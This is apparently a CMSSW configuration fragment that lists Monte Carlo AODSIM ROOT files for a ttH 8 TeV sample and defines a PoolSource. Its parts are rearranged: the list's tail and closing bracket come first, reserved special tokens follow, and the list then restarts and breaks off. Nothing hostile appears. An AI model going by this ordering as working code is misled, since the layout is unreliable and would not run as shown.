'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9EBE5A69-C70B-E211-A36E-001E67398E12.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9C84FAB1-D90B-E211-8EDF-001E67396874.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9AFA54C5-D90B-E211-9C13-001E67396568.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9A4A0F32-C70B-E211-A372-002590200898.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/94BE773D-C70B-E211-836F-001E67398CE1.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/944B6544-B90B-E211-920A-002481E1511E.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/90CBB57E-E90B-E211-AB2F-0025902009C0.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8E16A8F3-D90B-E211-83D6-002590200B0C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ACD8F9C-B90B-E211-8F86-002590200B4C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ABCBFC1-D90B-E211-9C77-002590200B68.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8AAE9A07-A90B-E211-ABCF-001E673967C5.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8A5DE24C-C70B-E211-9271-002590200988.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/88CA0942-C70B-E211-A894-0025B31E3CC0.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7EFFEF3A-C70B-E211-A78B-001E67396A63.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7CDD1A9C-B90B-E211-99CE-003048D45FD8.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7A951BB1-D90B-E211-B97A-003048D476B4.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/78C1620C-A90B-E211-AF89-001E67396761.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/748AA33D-C70B-E211-AA21-001E67398390.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/74013EE7-D90B-E211-B929-001E673970C1.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/726A8A0A-A90B-E211-86C8-001E67397094.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/70698A49-C70B-E211-BE12-002590200A28.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E05B863-C70B-E211-B476-002590200938.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E03CAFF-D90B-E211-96B9-001E67396C52.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6CB7A769-C70B-E211-A569-002590200A80.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6C3E469D-B90B-E211-93ED-003048D45FE8.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/68D8E30B-A90B-E211-9884-003048673F24.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6644544A-C70B-E211-B9D8-001E67398E49.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/60FAAC62-9C0B-E211-B091-002590200B00.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E932B7F-F60B-E211-A37C-001E67398C05.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E2DFB9D-B90B-E211-8767-0025B31E3C3C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5C9369BA-D90B-E211-AB39-001E67397396.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5485BB36-C70B-E211-A62A-002590200A98.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/54439593-B90B-E211-AF3D-001E67398011.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/540D144A-9C0B-E211-BE2D-001E67396C9D.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5087B43E-B90B-E211-834E-003048D45FB6.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/50119B4C-C70B-E211-BC7A-00259020083C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4EBF2B87-B90B-E211-8020-003048D476C4.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E90C544-B90B-E211-92CF-001E67396DCE.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E42EA41-C70B-E211-89E7-002590200900.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E24ECEB-D90B-E211-B732-001E67397CCE.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4A3C00E2-D90B-E211-81B6-0025902009B0.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/487FA490-B90B-E211-B401-003048D45FE8.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/46C80D32-C70B-E211-ADC0-003048D45F98.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4680304C-B90B-E211-9E05-003048D479F2.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4442750C-A90B-E211-982C-001E67396644.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/428A4E96-B90B-E211-8098-002590200B74.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4048B9E0-D90B-E211-AD88-001E67397B07.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3ECD1D4C-B90B-E211-BCE7-003048D46034.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3EA42648-9C0B-E211-96A1-001E673972F6.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3E5C2DB5-D90B-E211-AFAA-9C8E991A143E.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3C91E824-A90B-E211-A981-001E67397D00.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3AF523B1-D90B-E211-A075-001E67396BB7.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3A3BB131-C70B-E211-AE83-001E67396DB5.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3642D7AF-D90B-E211-A79C-0030486740BA.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30A91F44-9C0B-E211-ABA7-001E6739811A.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30897650-C70B-E211-9F69-0025902008D8.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/304AEF43-C70B-E211-8856-003048D45F98.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2E24DE3A-B90B-E211-ACC7-0025B3E06556.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2CE679E6-D90B-E211-B835-002590200B0C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2C7439E9-D90B-E211-8919-002590200930.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2AFB4848-B90B-E211-A519-001E673965FE.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2A854B08-A90B-E211-9851-001E67397701.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2817039C-B90B-E211-9F8D-0025B31E3C58.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/241AF10A-A90B-E211-BB12-001E67397CCE.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/240A3B43-B90B-E211-BA5F-002481E14FFC.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/20986287-B90B-E211-942A-003048D47A4C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1EB30D07-DA0B-E211-BE8F-001E67398E62.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1E2DEC38-B90B-E211-B323-003048D476C2.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1C490588-B90B-E211-99B7-003048D45FAE.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0E69E144-B90B-E211-AFD2-0025B3E05DB6.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CF5EAB8-D90B-E211-AD4B-002590200AD0.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CBE6239-B90B-E211-8155-001E67396A18.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/08A93150-9C0B-E211-9BF5-001E67396EAA.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0639D68C-B90B-E211-953D-003048D4609E.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/060DDA6A-C70B-E211-BF0C-001E67396D4C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/02C8D108-DA0B-E211-8141-001E67397396.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0078C0C1-D90B-E211-83A4-001E67396E32.root'
])
secFiles.extend([])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
maxEvents = cms.untracked.PSet(input=cms.untracked.int32(-1))
readFiles = cms.untracked.vstring()
secFiles = cms.untracked.vstring()
source = cms.Source('PoolSource', fileNames=readFiles, secondaryFileNames=
secFiles)
readFiles.extend([
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FE26AAB2-D90B-E211-AD0F-0025902009B8.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FCB6A333-C70B-E211-8C99-001E67396D51.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FA9CB2B5-D90B-E211-82B1-001E67397B07.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F8F81697-E90B-E211-9A48-002590200834.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F88B7838-C70B-E211-8971-001E673968F1.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F6481280-E90B-E211-8349-002590200B34.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F4DAB680-B90B-E211-BE7E-003048D47A6C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F2F3F436-C70B-E211-A3A4-002481E1511E.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F03693B3-D90B-E211-8CFB-001E67398633.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEF20E3B-C70B-E211-953A-002590200970.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEA69380-E90B-E211-833A-002590200970.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EE92E708-A90B-E211-BE6A-001E67397B07.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EC8A6530-C70B-E211-9D59-002590200840.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EAE34E85-B90B-E211-B5AD-003048673F3A.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EACF738F-E90B-E211-8D44-00259020081C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/E43E9F40-C70B-E211-8CFE-001E67396644.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DEF585B4-D90B-E211-AD4B-002590200B38.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE991237-C70B-E211-A065-001E67397003.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE69B13F-B90B-E211-A320-002481E1511E.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DCDE4B42-C70B-E211-9F88-003048D4602A.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DC7EDE05-A90B-E211-B465-0025902008F4.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DAFF741D-A90B-E211-B24E-001E673969D2.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D865D241-B90B-E211-A391-003048673F26.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D6C4A74C-C70B-E211-B449-003048D45F78.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D4EB5C31-C70B-E211-AC1B-002590200AD0.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D49F4B34-C70B-E211-99F4-0025B3E06400.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D2C6963C-C70B-E211-9D24-002590200908.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D26CAF3C-C70B-E211-A812-002590200930.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D026AE93-B90B-E211-9E76-002481E14D76.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CCD8F139-C70B-E211-B2E8-003048D47A4C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA85ABB8-D90B-E211-A2BB-001E67397E13.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA63512E-C70B-E211-8DDF-001E672CC1E7.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C480E406-A90B-E211-8B58-001E67397D00.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D5E949-9C0B-E211-A208-001E673967C5.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D100AE-D90B-E211-8962-001E67396DBA.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/BCF27C36-C70B-E211-876B-002590200A6C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B4E711BB-D90B-E211-A42C-001E67396E3C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B2A005DE-D90B-E211-94B3-001E67397D91.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AC3D508B-B90B-E211-AB8D-003048D45F2C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAC74E91-B90B-E211-A9FF-002590200A98.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAAE1D0A-A90B-E211-907D-001E67398CB9.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A89EA633-C70B-E211-AF12-0025902009A4.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A836D251-C70B-E211-BFDD-0025902008E4.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A448E095-E90B-E211-8CED-001E673969D2.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9EBE5A69-C70B-E211-A36E-001E67398E12.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9C84FAB1-D90B-E211-8EDF-001E67396874.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9AFA54C5-D90B-E211-9C13-001E67396568.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9A4A0F32-C70B-E211-A372-002590200898.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/94BE773D-C70B-E211-836F-001E67398CE1.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/944B6544-B90B-E211-920A-002481E1511E.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/90CBB57E-E90B-E211-AB2F-0025902009C0.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8E16A8F3-D90B-E211-83D6-002590200B0C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ACD8F9C-B90B-E211-8F86-002590200B4C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ABCBFC1-D90B-E211-9C77-002590200B68.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8AAE9A07-A90B-E211-ABCF-001E673967C5.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8A5DE24C-C70B-E211-9271-002590200988.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/88CA0942-C70B-E211-A894-0025B31E3CC0.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7EFFEF3A-C70B-E211-A78B-001E67396A63.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7CDD1A9C-B90B-E211-99CE-003048D45FD8.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7A951BB1-D90B-E211-B97A-003048D476B4.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/78C1620C-A90B-E211-AF89-001E67396761.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/748AA33D-C70B-E211-AA21-001E67398390.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/74013EE7-D90B-E211-B929-001E673970C1.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/726A8A0A-A90B-E211-86C8-001E67397094.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/70698A49-C70B-E211-BE12-002590200A28.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E05B863-C70B-E211-B476-002590200938.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E03CAFF-D90B-E211-96B9-001E67396C52.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6CB7A769-C70B-E211-A569-002590200A80.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6C3E469D-B90B-E211-93ED-003048D45FE8.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/68D8E30B-A90B-E211-9884-003048673F24.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6644544A-C70B-E211-B9D8-001E67398E49.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/60FAAC62-9C0B-E211-B091-002590200B00.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E932B7F-F60B-E211-A37C-001E67398C05.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E2DFB9D-B90B-E211-8767-0025B31E3C3C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5C9369BA-D90B-E211-AB39-001E67397396.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5485BB36-C70B-E211-A62A-002590200A98.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/54439593-B90B-E211-AF3D-001E67398011.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/540D144A-9C0B-E211-BE2D-001E67396C9D.root'
,
